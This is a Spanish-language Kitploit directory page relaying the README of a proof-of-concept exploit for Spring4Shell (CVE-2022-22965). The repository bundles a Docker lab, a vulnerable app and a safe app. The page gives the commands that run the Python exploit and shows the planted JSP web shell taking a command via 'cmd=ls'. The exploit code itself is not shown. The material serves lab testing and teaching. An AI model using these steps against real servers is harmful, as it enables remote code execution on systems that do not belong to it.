Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-22965 — Exploit de prueba de concepto para CVE-2022-22965 (Spring4Shell) con una aplicación vulnerable Spring Boot, script de exploit en Python y entorno de laboratorio basado en Docker para pruebas. | Kitploit
Herramientas/GitHubGitHub/mariomamo/cve-2022-22965
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubmariomamo/cve-2022-22965

CVE-2022-22965

Exploit de prueba de concepto para CVE-2022-22965 (Spring4Shell) con una aplicación vulnerable Spring Boot, script de exploit en Python y entorno de laboratorio basado en Docker para pruebas.

Ver Repositorio
51hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

👾 CVE-2022-22965

Esta es una prueba de concepto de un exploit para la vulnerabilidad CVE-2022-22965 (spring4shell). Está compuesto por:

  • Una aplicación Springboot vulnerable;
  • Un script de exploit escrito en Python;
  • Una aplicación segura para probar que el exploit no funciona;
  • Un Dockerfile para ejecutar la aplicación vulnerable y probar el exploit;

🔧Colaboradores

  • [🇮🇹] Mario Offertucci;
  • [🇮🇹] Antonio Donnarumma.

⚙️ Requisitos previos

  • Docker: Se utiliza para ejecutar un contenedor tomcat con la aplicación Springboot;
  • Python: Se utiliza para ejecutar el exploit;

1️⃣ Ejecutando la aplicación Springboot

Dentro de la carpeta raíz del proyecto hay un Dockerfile que crea una imagen de tomcat y copia los archivos vulnerable_app/target/spring4shell.war y safe_app/target/safeapp.war dentro de la carpeta /usr/local/tomcat/webapps, por lo que solo tienes que construir la imagen e iniciar el contenedor.

Construir la imagen de tomcat

root@kitploit:~
docker build -t cve_2022_22965 .

Iniciar el contenedor

root@kitploit:~
docker run -p 8080:8080 -d --name springshell cve_2022_22965

Verificar si la aplicación responde

root@kitploit:~
curl --location --request POST http://localhost:8080/spring4shell/vulnerability/exploit?name=Elliot%20Alderson

Si ves esta respuesta

root@kitploit:~
This is Elliot Alderson

Entonces la aplicación está en funcionamiento.

2️⃣ Ahora puedes ejecutar el exploit

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit

Puedes especificar opcionalmente el nombre del archivo jsp inyectado, pero no es obligatorio. Ejemplo

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit -f exploit.jsp

Si no especificas un nombre, se generará uno aleatorio.

Verás lo siguiente en la shell de comandos
Después del exploit, también puedes enviar un comando a través de una solicitud HTTP GET

root@kitploit:~
http://localhost:8080/exploit.jsp?pwd=pass&cmd=ls

¡Has abierto exitosamente una shell en la máquina víctima! ¡disfruta!

Descargar herramienta